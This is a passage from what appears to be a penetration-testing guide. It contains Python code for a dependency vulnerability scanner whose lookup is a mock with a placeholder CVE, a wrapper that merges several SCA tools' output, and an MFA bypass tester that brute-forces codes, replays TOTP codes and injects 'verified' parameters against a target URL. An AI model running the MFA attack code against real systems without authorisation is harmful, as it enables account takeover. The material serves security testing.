        all_deps.update(package_data.get('peerDependencies', {}))
        all_deps.update(package_data.get('optionalDependencies', {}))
        
        # Use npm audit or check against vulnerability DB
        for dep, version in all_deps.items():
            # Clean version string
            clean_version = version.replace('^', '').replace('~', '').replace('>=', '').replace('<=', '')
            
            # Check vulnerability databases
            dep_vulns = self.check_vulnerability_db('npm', dep, clean_version)
            vulns.extend(dep_vulns)
        
        return vulns
    
    def scan_npm_lockfile(self, file_path):
        """Scan npm lockfile for precise versions"""
        vulns = []
        
        with open(file_path) as f:
            if file_path.name == 'package-lock.json':
                lock_data = json.load(f)
                # Parse package-lock.json structure
                if 'packages' in lock_data:
                    for pkg_path, pkg_info in lock_data['packages'].items():
                        if pkg_path and 'version' in pkg_info:
                            pkg_name = pkg_path.split('node_modules/')[-1]
                            if not pkg_name.startswith('@'):
                                dep_vulns = self.check_vulnerability_db(
                                    'npm', pkg_name, pkg_info['version']
                                )
                                vulns.extend(dep_vulns)
            elif file_path.name == 'yarn.lock':
                # Parse yarn.lock (simplified line-based parsing; use a
                # dedicated lockfile parser for production work)
                content = f.read()
                current_pkg = None
                
                for raw_line in content.split('\n'):
                    stripped = raw_line.strip()
                    if not stripped or stripped.startswith('#'):
                        continue
                    if not raw_line.startswith(' ') and '@' in stripped:
                        # Entry header, e.g. lodash@^4.17.0:
                        current_pkg = stripped.lstrip('"').split('@')[0]
                    elif stripped.startswith('version') and current_pkg:
                        # Resolved version line, e.g. version "4.17.21"
                        version = stripped.split('"')[1] if '"' in stripped else stripped.split()[-1]
                        vulns.extend(
                            self.check_vulnerability_db('npm', current_pkg, version)
                        )
                        current_pkg = None
        
        return vulns
    
    def scan_pip_requirements(self, file_path):
        """Scan Python requirements.txt"""
        vulns = []
        
        with open(file_path) as f:
            for line in f:
                line = line.strip()
                if line and not line.startswith('#'):
                    # Parse package name and version
                    parts = line.split('==')
                    if len(parts) == 2:
                        pkg_name = parts[0].strip()
                        version = parts[1].strip()
                        
                        # Check for extras
                        if '[' in pkg_name:
                            pkg_name = pkg_name.split('[')[0]
                        
                        dep_vulns = self.check_vulnerability_db('pypi', pkg_name, version)
                        vulns.extend(dep_vulns)
        
        return vulns
    
    def scan_java_dependencies(self, file_path):
        """Scan Java Maven/Gradle files"""
        vulns = []
        
        if file_path.name == 'pom.xml':
            # Parse Maven pom.xml
            tree = ET.parse(file_path)
            root = tree.getroot()
            
            # Namespace handling
            ns = {'mvn': 'http://maven.apache.org/POM/4.0.0'}
            
            # Check dependencies
            for dep in root.findall('.//mvn:dependency', ns):
                group_id = dep.find('mvn:groupId', ns)
                artifact_id = dep.find('mvn:artifactId', ns)
                version = dep.find('mvn:version', ns)
                
                if group_id is not None and artifact_id is not None and version is not None:
                    pkg_name = f"{group_id.text}:{artifact_id.text}"
                    dep_vulns = self.check_vulnerability_db('maven', pkg_name, version.text)
                    vulns.extend(dep_vulns)
        
        elif 'build.gradle' in file_path.name:
            # Parse Gradle build file (simplified)
            with open(file_path) as f:
                content = f.read()
                
                # Look for dependency declarations
                import re
                
                # implementation, api, compile, runtimeOnly patterns
                patterns = [
                    # group:artifact:version
                    r"(?:implementation|api|compile|runtimeOnly)\s+['\"]([^:'\"]+):([^:'\"]+):([^:'\"]+)['\"]",
                    # group:artifact only (version managed elsewhere, e.g. by a BOM)
                    r"(?:implementation|api|compile|runtimeOnly)\s+['\"]([^:'\"]+):([^:'\"]+)['\"]",
                ]
                
                for pattern in patterns:
                    matches = re.findall(pattern, content)
                    for match in matches:
                        if len(match) == 3:
                            group, artifact, version = match
                            pkg_name = f"{group}:{artifact}"
                            dep_vulns = self.check_vulnerability_db('maven', pkg_name, version)
                            vulns.extend(dep_vulns)
                        # Two-element matches carry no inline version, so there is
                        # no concrete version to check against the database
        
        return vulns
    
    def check_vulnerability_db(self, ecosystem, package, version):
        """Check package against vulnerability databases"""
        vulns = []
        
        # This is a simplified version
        # In reality, you would:
        # 1. Query NVD API
        # 2. Query OSS Index
        # 3. Query GitHub Advisory Database
        # 4. Query internal vulnerability DB
        
        # For demonstration, we'll use a mock check
        critical_packages = {
            'npm': ['lodash', 'express', 'moment', 'axios'],
            'pypi': ['django', 'flask', 'requests', 'urllib3'],
            'maven': ['log4j', 'spring-core', 'jackson-databind'],
        }
        
        if ecosystem in critical_packages:
            if package.lower() in [p.lower() for p in critical_packages[ecosystem]]:
                # Mock vulnerability (the manifest path is not passed into this
                # method, so it cannot be reported here without a signature change)
                vulns.append({
                    'ecosystem': ecosystem,
                    'package': package,
                    'version': version,
                    'vulnerability': 'CVE-2023-XXXXX',
                    'severity': 'HIGH',
                    'description': 'Mock vulnerability for demonstration',
                    'source': 'mock'
                })
        
        return vulns
    
    def scan_dockerfile(self, file_path):
        """Scan Dockerfile for vulnerable base images and packages"""
        vulns = []
        
        with open(file_path) as f:
            lines = f.readlines()
            
            for line in lines:
                line = line.strip()
                
                # Check base image
                if line.upper().startswith('FROM'):
                    parts = line.split()
                    if len(parts) >= 2:
                        image = parts[1]
                        
                        # Check for old or vulnerable base images
                        vulnerable_images = [
                            'node:8', 'python:2.7', 'ubuntu:14.04',
                            'alpine:3.5', 'centos:6', 'debian:8'
                        ]
                        
                        for vulnerable in vulnerable_images:
                            if vulnerable in image:
                                vulns.append({
                                    'file': str(file_path.relative_to(self.project_path)),
                                    'type': 'docker_image',
                                    'image': image,
                                    'vulnerability': 'Outdated base image',
                                    'severity': 'HIGH',
                                    'description': f'Base image {image} is outdated and may contain vulnerabilities'
                                })
                
                # Check for apt-get install without version pins
                elif 'apt-get install' in line and '=' not in line:
                    vulns.append({
                        'file': str(file_path.relative_to(self.project_path)),
                        'type': 'docker_package',
                        'line': line,
                        'vulnerability': 'Unpinned package versions',
                        'severity': 'MEDIUM',
                        'description': 'Package versions should be pinned to avoid unexpected updates'
                    })
        
        return vulns
    
    def scan_terraform(self, file_path):
        """Scan Terraform files for vulnerable providers/modules"""
        vulns = []
        
        with open(file_path) as f:
            content = f.read()
            
            # Look for provider declarations
            import re
            provider_patterns = [
                r'provider\s+"([^"]+)"\s*{',
                r'module\s+"([^"]+)"\s*{'
            ]
            
            for pattern in provider_patterns:
                matches = re.findall(pattern, content)
                for match in matches:
                    # Flag common cloud providers for manual review; they are not
                    # vulnerable per se, but are frequent sources of misconfiguration
                    flagged_providers = [
                        'aws', 'azurerm', 'google', 'kubernetes'
                    ]
                    
                    if any(vp in match.lower() for vp in flagged_providers):
                        vulns.append({
                            'file': str(file_path.relative_to(self.project_path)),
                            'type': 'terraform',
                            'provider': match,
                            'vulnerability': 'Potential misconfiguration',
                            'severity': 'MEDIUM',
                            'description': f'Provider {match} may have security implications'
                        })
        
        return vulns
    
    def deduplicate_vulnerabilities(self, vulnerabilities):
        """Remove duplicate vulnerabilities"""
        unique_vulns = []
        seen = set()
        
        for vuln in vulnerabilities:
            # Create unique identifier
            vuln_id = f"{vuln.get('package', '')}:{vuln.get('version', '')}:{vuln.get('vulnerability', '')}"
            
            if vuln_id not in seen:
                seen.add(vuln_id)
                unique_vulns.append(vuln)
        
        return unique_vulns
    
    def generate_report(self, vulnerabilities):
        """Generate comprehensive vulnerability report"""
        report = {
            'scan_date': datetime.now().isoformat(),
            'project_path': str(self.project_path),
            'total_vulnerabilities': len(vulnerabilities),
            'vulnerabilities_by_severity': {},
            'vulnerabilities_by_ecosystem': {},
            'detailed_vulnerabilities': vulnerabilities
        }
        
        # Count by severity
        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        for severity in severities:
            count = sum(1 for v in vulnerabilities if v.get('severity') == severity)
            report['vulnerabilities_by_severity'][severity] = count
        
        # Count by ecosystem
        ecosystems = {}
        for vuln in vulnerabilities:
            ecosystem = vuln.get('ecosystem', 'unknown')
            if ecosystem not in ecosystems:
                ecosystems[ecosystem] = 0
            ecosystems[ecosystem] += 1
        
        report['vulnerabilities_by_ecosystem'] = ecosystems
        
        return report

# Advanced integration with actual vulnerability databases
class AdvancedVulnerabilityChecker:
    """Integrates with real vulnerability databases"""
    
    def __init__(self):
        self.cache = {}
        
    def check_nvd(self, cpe_string):
        """Check the NVD database (REST API 2.0; the 1.0 API is retired)"""
        # Format: cpe:2.3:a:apache:log4j:2.14.1:*:*:*:*:*:*:*
        url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?cpeName={cpe_string}"
        
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                return response.json()
        except requests.RequestException:
            pass
        
        return None
    
    def check_oss_index(self, ecosystem, package, version):
        """Check Sonatype OSS Index"""
        url = "https://ossindex.sonatype.org/api/v3/component-report"
        
        payload = {
            "coordinates": [f"pkg:{ecosystem}/{package}@{version}"]
        }
        
        headers = {
            "Content-Type": "application/json"
        }
        
        try:
            response = requests.post(url, json=payload, headers=headers, timeout=10)
            if response.status_code == 200:
                return response.json()
        except requests.RequestException:
            pass
        
        return None
    
    def check_github_advisory(self, ecosystem, package):
        """Check GitHub Advisory Database"""
        url = f"https://api.github.com/advisories"
        params = {
            'ecosystem': ecosystem,
            'package': package
        }
        
        headers = {
            'Accept': 'application/vnd.github+json'
        }
        
        try:
            response = requests.get(url, params=params, headers=headers, timeout=10)
            if response.status_code == 200:
                return response.json()
        except requests.RequestException:
            pass
        
        return None

# Usage
scanner = DependencyVulnerabilityScanner("/path/to/your/project")
report = scanner.scan_all_dependencies()

print(f"\n{'='*60}")
print("DEPENDENCY VULNERABILITY SCAN REPORT")
print(f"{'='*60}")
print(f"Project: {report['project_path']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Vulnerabilities: {report['total_vulnerabilities']}")

print(f"\nBy Severity:")
for severity, count in report['vulnerabilities_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

print(f"\nBy Ecosystem:")
for ecosystem, count in report['vulnerabilities_by_ecosystem'].items():
    if count > 0:
        print(f"  {ecosystem}: {count}")

# Print critical vulnerabilities
critical_vulns = [v for v in report['detailed_vulnerabilities'] 
                  if v.get('severity') == 'CRITICAL']
if critical_vulns:
    print(f"\nCRITICAL VULNERABILITIES:")
    for vuln in critical_vulns[:5]:  # Show first 5
        print(f"  - {vuln.get('package')} {vuln.get('version')}: {vuln.get('vulnerability')}")

6.2 Software Composition Analysis (SCA) Integration

```
#!/usr/bin/env python3
"""
Advanced Software Composition Analysis (SCA) Integration
Combines multiple SCA tools and vulnerability databases
"""
import subprocess
import json
from pathlib import Path

class AdvancedSCAIntegrator:
    def __init__(self, project_path):
        self.project_path = Path(project_path)
        self.results = {}
        
        # Tool configurations
        self.tools = {
            'owasp_dependency_check': {
                'command': 'dependency-check',
                'args': ['--scan', '.', '--format', 'JSON', '--out', 'dependency-check-report.json'],
                'report_file': 'dependency-check-report.json'
            },
            'snyk': {
                'command': 'snyk',
                'args': ['test', '--json'],
                'report_file': None  # Outputs to stdout
            },
            'trivy': {
                'command': 'trivy',
                'args': ['fs', '-f', 'json', '.'],
                'report_file': None  # Outputs to stdout
            },
            'npm_audit': {
                'command': 'npm',
                'args': ['audit', '--json'],
                'report_file': None  # Outputs to stdout
            },
            'pip_audit': {
                'command': 'pip-audit',
                'args': ['--format', 'json'],
                'report_file': None  # Outputs to stdout
            }
        }
    
    def run_all_sca_tools(self):
        """Run all configured SCA tools"""
        print(f"[*] Running SCA tools on {self.project_path}")
        
        for tool_name, config in self.tools.items():
            print(f"[*] Running {tool_name}...")
            
            try:
                result = self.run_tool(tool_name, config)
                self.results[tool_name] = result
                print(f"[+] {tool_name} completed successfully")
            except Exception as e:
                print(f"[-] {tool_name} failed: {e}")
                self.results[tool_name] = {'error': str(e)}
        
        # Merge and analyze results
        merged_results = self.merge_results()
        return merged_results
    
    def run_tool(self, tool_name, config):
        """Run individual SCA tool"""
        cmd = [config['command']] + config['args']
        
        try:
            # Run the tool from the project directory (cwd=) rather than
            # os.chdir, which would be unsafe under concurrency
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=300,  # 5 minute timeout
                cwd=self.project_path
            )
            
            if result.returncode != 0 and tool_name not in ['snyk', 'npm_audit', 'pip_audit']:
                # These tools return non-zero when vulnerabilities are found
                print(f"[-] {tool_name} returned {result.returncode}")
            
            # Parse output
            if config['report_file']:
                # Read from report file
                report_path = self.project_path / config['report_file']
                if report_path.exists():
                    with open(report_path) as f:
                        output = json.load(f)
                else:
                    output = {'error': 'Report file not found'}
            else:
                # Parse stdout
                try:
                    output = json.loads(result.stdout)
                except json.JSONDecodeError:
                    output = {'raw_output': result.stdout, 'stderr': result.stderr}
            
            return {
                'returncode': result.returncode,
                'stdout': result.stdout[:1000],  # First 1000 chars
                'stderr': result.stderr[:1000],
                'output': output
            }
        
        except subprocess.TimeoutExpired:
            return {'error': 'Timeout expired'}
    
    def merge_results(self):
        """Merge results from multiple SCA tools"""
        merged_vulnerabilities = []
        
        # Extract vulnerabilities from each tool's output
        for tool_name, result in self.results.items():
            if 'output' in result and isinstance(result['output'], dict):
                vulnerabilities = self.extract_vulnerabilities(tool_name, result['output'])
                merged_vulnerabilities.extend(vulnerabilities)
        
        # Deduplicate and prioritize
        unique_vulns = self.deduplicate_vulnerabilities(merged_vulnerabilities)
        
        # Generate unified report
        report = {
            'summary': {
                'total_tools_run': len(self.results),
                'tools_successful': sum(1 for r in self.results.values() if 'error' not in r),
                'total_vulnerabilities': len(unique_vulns)
            },
            'tool_results': self.results,
            'vulnerabilities': unique_vulns
        }
        
        return report
    
    def extract_vulnerabilities(self, tool_name, output):
        """Extract vulnerabilities from tool-specific output format"""
        vulnerabilities = []
        
        if tool_name == 'owasp_dependency_check':
            # OWASP Dependency Check format
            if 'dependencies' in output:
                for dep in output['dependencies']:
                    if 'vulnerabilities' in dep:
                        for vuln in dep['vulnerabilities']:
                            vulnerabilities.append({
                                'tool': tool_name,
                                'source': 'dependency-check',
                                'dependency': dep.get('fileName', 'Unknown'),
                                'vulnerability': vuln.get('name', 'Unknown'),
                                'severity': vuln.get('severity', 'MEDIUM').upper(),
                                'description': vuln.get('description', ''),
                                'cvss_score': vuln.get('cvssv3', {}).get('baseScore', 0),
                                'cwe': vuln.get('cwe', ''),
                                'references': vuln.get('references', [])
                            })
        
        elif tool_name == 'snyk':
            # Snyk format
            if 'vulnerabilities' in output:
                for vuln in output['vulnerabilities']:
                    vulnerabilities.append({
                        'tool': tool_name,
                        'source': 'snyk',
                        'package': vuln.get('packageName', 'Unknown'),
                        'vulnerability': vuln.get('title', 'Unknown'),
                        'severity': vuln.get('severity', 'MEDIUM').upper(),
                        'description': vuln.get('description', ''),
                        'cvss_score': vuln.get('cvssScore', 0),
                        'cwe': vuln.get('identifiers', {}).get('CWE', []),
                        'references': vuln.get('references', [])
                    })
        
        elif tool_name == 'trivy':
            # Trivy format
            if 'Results' in output:
                for result in output['Results']:
                    if 'Vulnerabilities' in result:
                        for vuln in result['Vulnerabilities']:
                            vulnerabilities.append({
                                'tool': tool_name,
                                'source': 'trivy',
                                'package': vuln.get('PkgName', 'Unknown'),
                                'vulnerability': vuln.get('VulnerabilityID', 'Unknown'),
                                'severity': vuln.get('Severity', 'MEDIUM').upper(),
                                'description': vuln.get('Description', ''),
                                'cvss_score': vuln.get('CVSS', {}).get('nvd', {}).get('V3Score', 0),
                                'references': vuln.get('References', [])
                            })
        
        elif tool_name == 'npm_audit':
            # npm audit format
            if 'vulnerabilities' in output:
                for pkg_name, vuln_info in output['vulnerabilities'].items():
                    if 'via' in vuln_info:
                        for via in vuln_info['via']:
                            if isinstance(via, dict):  # Vulnerability object
                                vulnerabilities.append({
                                    'tool': tool_name,
                                    'source': 'npm-audit',
                                    'package': pkg_name,
                                    'vulnerability': via.get('title', 'Unknown'),
                                    'severity': via.get('severity', 'MEDIUM').upper(),
                                    'description': via.get('description', ''),
                                    'cvss_score': via.get('cvss', {}).get('score', 0),
                                    'references': via.get('urls', [])
                                })
        
        return vulnerabilities
    
    def deduplicate_vulnerabilities(self, vulnerabilities):
        """Remove duplicate vulnerabilities across tools"""
        unique_vulns = []
        seen_identifiers = set()
        
        for vuln in vulnerabilities:
            # Unique identifier; dependency-check reports 'dependency' rather than 'package'
            pkg = vuln.get('package') or vuln.get('dependency', '')
            identifier = f"{pkg}:{vuln.get('vulnerability')}"
            
            if identifier not in seen_identifiers:
                seen_identifiers.add(identifier)
                vuln['detected_by'] = [vuln.get('tool')]
                unique_vulns.append(vuln)
            else:
                # Record the additional detecting tool on the existing entry
                for existing in unique_vulns:
                    existing_pkg = existing.get('package') or existing.get('dependency', '')
                    if (existing_pkg == pkg and
                        existing.get('vulnerability') == vuln.get('vulnerability')):
                        if vuln.get('tool') not in existing['detected_by']:
                            existing['detected_by'].append(vuln.get('tool'))
        
        # Sort by severity (CRITICAL, HIGH, MEDIUM, LOW)
        severity_order = {'CRITICAL': 0, 'HIGH': 1, 'MEDIUM': 2, 'LOW': 3}
        unique_vulns.sort(key=lambda x: severity_order.get(x.get('severity', 'MEDIUM'), 4))
        
        return unique_vulns
    
    def generate_remediation_plan(self, vulnerabilities):
        """Generate remediation plan for vulnerabilities"""
        remediation = {
            'immediate_actions': [],
            'short_term_actions': [],
            'long_term_actions': []
        }
        
        for vuln in vulnerabilities:
            severity = vuln.get('severity', 'MEDIUM')
            
            action = {
                'vulnerability': vuln.get('vulnerability'),
                'package': vuln.get('package'),
                'severity': severity,
                'action': self.get_remediation_action(vuln)
            }
            
            if severity in ['CRITICAL', 'HIGH']:
                remediation['immediate_actions'].append(action)
            elif severity == 'MEDIUM':
                remediation['short_term_actions'].append(action)
            else:
                remediation['long_term_actions'].append(action)
        
        return remediation
    
    def get_remediation_action(self, vulnerability):
        """Get specific remediation action for vulnerability"""
        tool = vulnerability.get('tool', '')
        
        actions = []
        
        # Ecosystem-specific actions, keyed off the reporting tool
        # ('package' holds a package name here, not a manifest path)
        if tool == 'npm_audit':
            actions.append("Run 'npm audit fix' to automatically fix vulnerabilities")
            actions.append("Update package.json with fixed versions")
        
        elif tool == 'pip_audit':
            actions.append("Update requirements.txt/Pipfile with secure versions")
            actions.append("Run 'pip-audit' to identify fixes")
        
        elif tool == 'owasp_dependency_check':
            actions.append("Update Maven/Gradle dependencies")
            actions.append("Use versions-maven-plugin for dependency management")
        
        # General actions
        actions.append("Review vulnerability details and assess impact")
        actions.append("Test updates in development environment before production")
        actions.append("Consider using dependency locking (package-lock.json, Pipfile.lock)")
        
        return actions

# Usage
sca = AdvancedSCAIntegrator("/path/to/your/project")
results = sca.run_all_sca_tools()

print(f"\n{'='*60}")
print("SOFTWARE COMPOSITION ANALYSIS RESULTS")
print(f"{'='*60}")
print(f"Tools Run: {results['summary']['total_tools_run']}")
print(f"Tools Successful: {results['summary']['tools_successful']}")
print(f"Total Vulnerabilities Found: {results['summary']['total_vulnerabilities']}")

# Generate remediation plan
remediation = sca.generate_remediation_plan(results['vulnerabilities'])

print(f"\nREMEDIATION PLAN")
print(f"{'='*60}")
print(f"\nImmediate Actions ({len(remediation['immediate_actions'])}):")
for action in remediation['immediate_actions'][:3]:  # Show first 3
    print(f"  - {action['package']}: {action['vulnerability']}")
    for step in action['action'][:2]:
        print(f"    * {step}")

print(f"\nShort Term Actions ({len(remediation['short_term_actions'])}):")
for action in remediation['short_term_actions'][:2]:
    print(f"  - {action['package']}: {action['vulnerability']}")

# Export results
with open('sca-report.json', 'w') as f:
    json.dump(results, f, indent=2)

with open('remediation-plan.json', 'w') as f:
    json.dump(remediation, f, indent=2)

print(f"\n[*] Reports saved to sca-report.json and remediation-plan.json")

Chapter 7: Identification & Authentication - Advanced Testing

7.1 Multi-Factor Authentication Bypass

```
#!/usr/bin/env python3
"""
Advanced MFA Bypass Testing Framework
Tests various MFA implementations for weaknesses
"""
import requests
import time
import pyotp
from urllib.parse import urljoin

class MFABypassTester:
    def __init__(self, base_url, session_cookies=None):
        self.base_url = base_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        
        # MFA bypass techniques
        self.techniques = {
            'backup_code_reuse': self.test_backup_code_reuse,
            'mfa_code_replay': self.test_code_replay,
            'mfa_timeout_bypass': self.test_timeout_bypass,
            'session_fixation_mfa': self.test_session_fixation,
            'api_endpoint_bypass': self.test_api_endpoint_bypass,
            'response_manipulation': self.test_response_manipulation,
            'rate_limit_bypass': self.test_rate_limit_bypass
        }
    
    def test_backup_code_reuse(self):
        """Test if backup codes can be reused"""
        findings = []
        
        # Scenario: Backup codes should be single-use
        test_cases = [
            {'code': '12345678', 'expected': 'should fail on second use'},
            {'code': '87654321', 'expected': 'should fail on second use'}
        ]
        
        for test in test_cases:
            backup_code = test['code']
            
            # First use
            response1 = self.submit_backup_code(backup_code)
            
            if response1.status_code == 200:
                # Immediately try second use
                response2 = self.submit_backup_code(backup_code)
                
                if response2.status_code == 200:
                    findings.append({
                        'technique': 'backup_code_reuse',
                        'vulnerability': 'Backup codes can be reused',
                        'code': backup_code,
                        'evidence': f'Code accepted twice: {backup_code}'
                    })
        
        return findings
    
    def test_code_replay(self):
        """Test if TOTP codes can be replayed"""
        findings = []
        
        # This requires timing and observation
        # Approach: Capture a valid code and try to reuse it
        
        # Simulate: Get current TOTP code (in real test, you'd capture this)
        # For demonstration, we'll use a known secret
        totp_secret = "JBSWY3DPEHPK3PXP"  # Example secret
        totp = pyotp.TOTP(totp_secret)
        current_code = totp.now()
        
        # Submit code
        response1 = self.submit_totp_code(current_code)
        
        if response1.status_code == 200:
            # Wait for next time interval
            time.sleep(31)  # TOTP codes typically valid for 30 seconds
            
            # Try same code again
            response2 = self.submit_totp_code(current_code)
            
            if response2.status_code == 200:
                findings.append({
                    'technique': 'mfa_code_replay',
                    'vulnerability': 'Expired TOTP codes can be replayed',
                    'evidence': f'Code {current_code} accepted after expiration'
                })
        
        return findings
    
    def test_timeout_bypass(self):
        """Test MFA timeout bypass"""
        findings = []
        
        # Test if MFA step times out or can be bypassed by waiting
        
        # 1. Start MFA process
        start_response = self.start_mfa_process()
        
        if start_response.status_code == 200:
            # 2. Wait longer than timeout (e.g., 5 minutes)
            print("[*] Waiting for MFA timeout (300 seconds)...")
            time.sleep(300)
            
            # 3. Try to submit code anyway
            test_code = '000000'
            response = self.submit_totp_code(test_code)
            
            if response.status_code == 200:
                findings.append({
                    'technique': 'mfa_timeout_bypass',
                    'vulnerability': 'MFA does not timeout',
                    'evidence': 'MFA code accepted after 5 minute delay'
                })
        
        return findings
    
    def test_session_fixation(self):
        """Test for MFA session fixation"""
        findings = []
        
        # 1. Get session before MFA
        session_before = self.get_session_state()
        
        # 2. Complete MFA
        self.complete_mfa()
        
        # 3. Get session after MFA
        session_after = self.get_session_state()
        
        # 4. Try to use pre-MFA session
        if session_before and session_after:
            if session_before != session_after:
                # Session changed after MFA (good)
                # Now try to use old session
                old_session_response = self.use_session(session_before)
                
                if old_session_response.status_code == 200:
                    findings.append({
                        'technique': 'session_fixation_mfa',
                        'vulnerability': 'Pre-MFA sessions remain valid',
                        'evidence': 'Old session accepted after MFA completion'
                    })
        
        return findings
    
    def test_api_endpoint_bypass(self):
        """Test for API endpoints that bypass MFA"""
        findings = []
        
        # Common API endpoints that might bypass MFA
        api_endpoints = [
            '/api/user/profile',
            '/api/account/settings',
            '/api/tokens/create',
            '/api/session/refresh',
            '/api/auth/verify',
            '/api/mfa/status',
            '/api/authenticated'
        ]
        
        for endpoint in api_endpoints:
            url = urljoin(self.base_url, endpoint)
            
            # Try to access without completing MFA
            response = self.session.get(url)
            
            if response.status_code == 200:
                # Check if endpoint returns sensitive data
                sensitive_indicators = ['email', 'phone', 'address', 'permissions', 'roles']
                response_text = response.text.lower()
                
                if any(indicator in response_text for indicator in sensitive_indicators):
                    findings.append({
                        'technique': 'api_endpoint_bypass',
                        'vulnerability': f'API endpoint bypasses MFA: {endpoint}',
                        'evidence': f'Endpoint {endpoint} accessible without MFA'
                    })
        
        return findings
    
    def test_response_manipulation(self):
        """Test MFA response manipulation"""
        findings = []
        
        # Capture MFA verification request
        mfa_request = {
            'url': urljoin(self.base_url, '/api/mfa/verify'),
            'method': 'POST',
            'headers': {
                'Content-Type': 'application/json'
            },
            'data': {
                'code': '123456',
                'device_id': 'test_device'
            }
        }
        
        # Test various response manipulations
        
        # 1. Response bodies an intercepting proxy could substitute for a failure
        manipulated_responses = [
            {'status': 'success', 'verified': True},
            {'status': 'verified', 'mfa_passed': True},
            {'authenticated': True, 'mfa_complete': True},
            {'result': 'ok', 'code': 200}
        ]
        
        for manipulated_response in manipulated_responses:
            # This would require intercepting and modifying the response
            # For demonstration, we'll simulate
            print(f"[*] Testing response manipulation: {manipulated_response}")
        
        # 2. Test parameter manipulation
        parameters = ['verified', 'success', 'authenticated', 'status']
        
        for param in parameters:
            test_data = {'code': '123456', param: 'true'}
            response = self.session.post(
                mfa_request['url'],
                json=test_data,
                headers=mfa_request['headers']
            )
            
            if response.status_code == 200:
                try:
                    response_data = response.json()
                    if response_data.get('authenticated') or response_data.get('verified'):
                        findings.append({
                            'technique': 'response_manipulation',
                            'vulnerability': f'MFA bypass via parameter: {param}',
                            'evidence': f'Parameter {param}=true bypassed MFA'
                        })
                except ValueError:
                    pass  # response body was not JSON
        
        return findings
    
    def test_rate_limit_bypass(self):
        """Test MFA rate limiting bypass"""
        findings = []
        
        # Test brute force protection
        test_codes = ['000000', '111111', '222222', '333333', '444444', 
                     '555555', '666666', '777777', '888888', '999999']
        
        successful_attempts = 0
        
        for code in test_codes:
            response = self.submit_totp_code(code)
            
            if response.status_code == 200:
                successful_attempts += 1
            
            # Small delay between attempts
            time.sleep(0.5)
        
        if successful_attempts > 3:
            findings.append({
                'technique': 'rate_limit_bypass',
                'vulnerability': 'Weak or no MFA rate limiting',
                'evidence': f'{successful_attempts}/10 invalid codes accepted'
            })
        
        # Test parallel requests bypass
        import concurrent.futures
        
        def attempt_code(code):
            return self.submit_totp_code(code)
        
        # Send multiple requests simultaneously
        with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
            futures = [executor.submit(attempt_code, code) for code in test_codes]
            
            parallel_success = 0
            for future in concurrent.futures.as_completed(futures):
                try:
                    response = future.result()
                    if response.status_code == 200:
                        parallel_success += 1
                except Exception:
                    pass
        
        if parallel_success > 3:
            findings.append({
                'technique': 'rate_limit_bypass',
                'vulnerability': 'Rate limiting bypassed via parallel requests',
                'evidence': f'{parallel_success}/10 parallel invalid codes accepted'
            })
        
        return findings
    
    def run_all_tests(self):
        """Run all MFA bypass tests"""
        all_findings = []
        
        print("[*] Starting MFA bypass tests")
        
        for technique_name, technique_func in self.techniques.items():
            print(f"[*] Testing {technique_name}...")
            try:
                findings = technique_func()
                all_findings.extend(findings)
                print(f"[+] {technique_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {technique_name} failed: {e}")
        
        # Generate report
        report = {
            'total_findings': len(all_findings),
            'findings_by_technique': {},
            'findings_by_severity': {},
            'detailed_findings': all_findings
        }
        
        # Categorize findings
        for finding in all_findings:
            technique = finding.get('technique', 'unknown')
            if technique not in report['findings_by_technique']:
                report['findings_by_technique'][technique] = 0
            report['findings_by_technique'][technique] += 1
        
        return report
    
    # Helper methods (implement based on target application)
    def submit_backup_code(self, code):
        """Submit backup code to MFA endpoint"""
        url = urljoin(self.base_url, '/api/mfa/backup')
        return self.session.post(url, json={'code': code})
    
    def submit_totp_code(self, code):
        """Submit TOTP code to MFA endpoint"""
        url = urljoin(self.base_url, '/api/mfa/verify')
        return self.session.post(url, json={'code': code})
    
    def start_mfa_process(self):
        """Start MFA process"""
        url = urljoin(self.base_url, '/api/mfa/start')
        return self.session.post(url)
    
    def get_session_state(self):
        """Get current session state"""
        return self.session.cookies.get_dict()
    
    def complete_mfa(self):
        """Complete MFA process (simulated)"""
        url = urljoin(self.base_url, '/api/mfa/complete')
        return self.session.post(url)
    
    def use_session(self, session_cookies):
        """Use specific session cookies"""
        temp_session = requests.Session()
        temp_session.cookies.update(session_cookies)
        url = urljoin(self.base_url, '/api/user/profile')
        return temp_session.get(url)

# Usage
tester = MFABypassTester(
    "http://target.com",
    session_cookies={"SESSION": "your_session_id"}
)

report = tester.run_all_tests()

print(f"\n{'='*60}")
print("MFA BYPASS TESTING REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")

if report['total_findings'] > 0:
    print(f"\nFindings by Technique:")
    for technique, count in report['findings_by_technique'].items():
        print(f"  {technique}: {count}")
    
    print(f"\nCRITICAL FINDINGS:")
    critical_findings = [f for f in report['detailed_findings'] 
                        if 'reuse' in f.get('vulnerability', '').lower() or 
                           'bypass' in f.get('vulnerability', '').lower()]
    
    for finding in critical_findings[:3]:
        print(f"  - {finding['vulnerability']}")
        print(f"    Evidence: {finding.get('evidence', '')[:100]}...")

7.2 Advanced Password Policy Testing

```
#!/usr/bin/env python3
"""
Advanced Password Policy Testing and Weakness Analysis
Tests password policies, reset mechanisms, and storage
"""
import requests
import time
from urllib.parse import urljoin

class PasswordPolicyTester:
    def __init__(self, base_url):
        self.base_url = base_url
        self.session = requests.Session()
        self.findings = []
    
    def test_password_complexity(self):
        """Test password complexity requirements"""
        findings = []
        
        test_passwords = [
            # Common weak passwords
            ('password', 'No complexity'),
            ('123456', 'No complexity'),
            ('qwerty', 'No complexity'),
            ('letmein', 'No complexity'),
            
            # Short passwords
            ('a', 'Too short'),
            ('ab', 'Too short'),
            ('abc', 'Too short'),
            ('abcd', 'Too short'),
            
            # Common patterns
            ('Password1', 'Common pattern'),
            ('Welcome1', 'Common pattern'),
            ('Summer2023', 'Common pattern'),
            ('Winter2023!', 'Common pattern'),
            
            # Sequential characters
            ('abcdefg', 'Sequential letters'),
            ('12345678', 'Sequential numbers'),
            ('qwertyui', 'Keyboard pattern'),
            ('asdfghjk', 'Keyboard pattern'),
            
